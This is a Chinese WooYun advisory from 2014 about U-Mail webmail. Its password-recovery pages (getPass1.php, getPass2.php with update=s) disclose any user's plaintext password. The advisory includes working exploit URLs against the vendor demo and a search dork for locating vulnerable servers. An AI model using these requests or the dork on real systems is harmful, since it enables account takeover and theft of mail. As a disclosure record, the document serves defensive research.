漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-061894
漏洞标题:U-Mail邮件系统获取指定账户权限(任意用户明文密码查询)
相关厂商:U-Mail
漏洞作者: 路人甲
提交时间:2014-05-22 17:19
修复时间:2014-08-20 17:20
公开时间:2014-08-20 17:20
漏洞类型:非授权访问/权限绕过
危害等级:高
自评Rank:10
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-05-22: 细节已通知厂商并且等待厂商处理中
2014-05-27: 厂商已经确认,细节仅向厂商公开
2014-05-30: 细节向第三方安全合作伙伴开放
2014-07-21: 细节向核心白帽子及相关领域专家公开
2014-07-31: 细节向普通白帽子公开
2014-08-10: 细节向实习白帽子公开
2014-08-20: 细节向公众公开
简要描述:
可获取该系统指定用户权限,最近看发这套的人挺多的,不知道我这个你们觉得鸡肋不
详细说明:
u-mail取回密码处设计不当,导致任意用户密码可越权查看,当update=s时,可查看任意账户密码
直接查看指定邮箱账户密码
接下来想做什么都可以了。
谷歌: Powered by U-Mail 邮件服务器
官网Demo:
http://mail.comingchina.com/webmail/getPass1.php?email=umailtry@comingchina.com&update=s
http://mail.comingchina.com/webmail/getPass2.php?email=umailtry@comingchina.com&update=s
漏洞证明:
修复方案:
完善一下吧,啊拉拉拉~~~~
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:13
确认时间:2014-05-27 14:03
厂商回复:
CNVD确认并复现所述情况,由CNVD通过公开联系渠道向软件生产厂商通报,联系售前技术:0755-,, 处置。
最新状态:
暂无
漏洞评价:
评论
-
这玩意后门吧
-
!!
-
@redsin get
-
@Luverose @pandas 不知道发生了什么,但都是通知给厂商,没啥关系吧?
( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)